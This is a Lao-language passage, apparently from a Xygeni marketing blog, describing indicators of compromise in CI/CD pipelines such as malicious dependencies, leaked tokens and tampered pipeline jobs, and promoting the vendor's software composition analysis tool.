CI/CD pipelines ແມ່ນສະພາບແວດລ້ອມອັດຕະໂນມັດບ່ອນທີ່ນັກພັດທະນາ commit ລະຫັດ, ການດຶງການເພິ່ງພາອາໄສ, ແລະການປ່ອຍ builds. ຜູ້ໂຈມຕີຮູ້ວ່າການປະນີປະນອມໜຶ່ງຢູ່ທີ່ນີ້ຈະໄຫຼຜ່ານທຸກໆການນຳໃຊ້. ດັ່ງນັ້ນ, ຕົວຊີ້ວັດຂອງການປະນີປະນອມແມ່ນຫຍັງ? CI/CD pipelineພວກມັນເບິ່ງແຕກຕ່າງກັນຫຼາຍ:

  • ມີການເພີ່ມ dependency ທີ່ເປັນອັນຕະລາຍເຂົ້າໄປໃນ package.json ຫຼື requirements.txt ຢ່າງງຽບໆ.
  • ລະຫັດ API ຫຼືໂທເຄັນທີ່ຖືກເປີດເຜີຍໃນ Git commits ຫຼື ໄຟລ໌ .env.
  • ລະຫັດທີ່ສັບສົນຖືກສັກເຂົ້າໄປໃນແພັກເກດ npm ຫຼື PyPI.
  • ໄຟລ໌ Terraform ຫຼື Kubernetes ທີ່ມີຄ່າເລີ່ມຕົ້ນທີ່ບໍ່ປອດໄພເຊັ່ນ privileged: true.
  • Pipeline ວຽກທີ່ຖືກແກ້ໄຂເພື່ອກັ່ນຕອງຂໍ້ມູນ ຫຼື ເປີດປະຕູຫຼັງ.

ສັນຍານປະນີປະນອມເຫຼົ່ານີ້ໃນ CI/CD ຍັງຄົງເບິ່ງບໍ່ເຫັນ standard ເຄື່ອງມືຄວາມປອດໄພ.

ຊ່ອງຫວ່າງໃນຄວາມປອດໄພທາງໄຊເບີຂອງ IOC

ເຖິງແມ່ນວ່າຫຼາຍທີມເຂົ້າໃຈຄຸນຄ່າຂອງຕົວຊີ້ວັດການປະນີປະນອມ, ແຕ່ພວກເຂົາຍັງອີງໃສ່ພຽງແຕ່ການກວດຈັບຈາກເຊີບເວີ ແລະ ບັນທຶກເຄືອຂ່າຍເທົ່ານັ້ນ. ດັ່ງນັ້ນ, ຜູ້ໂຈມຕີສາມາດວາງສານພິດໃສ່ builds ຫຼື ໃສ່ມັນແວໂດຍບໍ່ປະໄວ້ຮ່ອງຮອຍຕາມປົກກະຕິ. ນີ້ແມ່ນເຫດຜົນທີ່ເຫດການຕ່າງໆເຊັ່ນ: backdoor XZ Utils ຫຼື ແພັກເກດ npm ທີ່ເປັນອັນຕະລາຍຈຶ່ງບໍ່ໄດ້ຮັບການກວດພົບຈົນກວ່າພວກມັນຈະຮອດການຜະລິດ.

ການປະນີປະນອມລະບົບຕ່ອງໂສ້ການສະໜອງປະເພດນີ້ຍັງຖືກເນັ້ນໃຫ້ເຫັນໂດຍ CISຄຳແນະນຳກ່ຽວກັບຄວາມປອດໄພຂອງລະບົບຕ່ອງໂສ້ການສະໜອງຂອງ A, ເຊິ່ງເຕືອນວ່າຜູ້ໂຈມຕີມີເປົ້າໝາຍເພີ່ມຂຶ້ນເລື້ອຍໆ CI/CD pipelines ແລະທະບຽນ.

The Takeaway

ຄວາມປອດໄພທາງໄຊເບີແບບດັ້ງເດີມຂອງ IOC ແມ່ນມີຄວາມຈຳເປັນແຕ່ບໍ່ພຽງພໍ. ເໜືອສິ່ງອື່ນໃດ, ທີມງານຕ້ອງຮັບຮູ້ຕົວຊີ້ວັດຂອງການປະນີປະນອມສະເພາະກັບ CI/CD pipelines. ຫຼັງຈາກນັ້ນເຂົາເຈົ້າຈຶ່ງສາມາດກວດຫາລະຫັດທີ່ເປັນອັນຕະລາຍ ຫຼື pipeline ການລ່ວງລະເມີດກ່ອນທີ່ມັນຈະແຜ່ລາມໄປທົ່ວສະພາບແວດລ້ອມ.

ເຄື່ອງມືວິເຄາະອົງປະກອບຊອບແວ SCA
ຈັດລຳດັບຄວາມສຳຄັນ, ແກ້ໄຂ ແລະ ຮັກສາຄວາມສ່ຽງດ້ານຊອບແວຂອງທ່ານໃຫ້ປອດໄພ
ຮັບບັນຊີຟຣີຂອງທ່ານ.
ບໍ່ຕ້ອງມີບັດເຄດິດ.

ຮັບປະກັນການພັດທະນາຊອບແວ ແລະ ການຈັດສົ່ງຂອງທ່ານ

ດ້ວຍຊຸດຜະລິດຕະພັນ Xygeni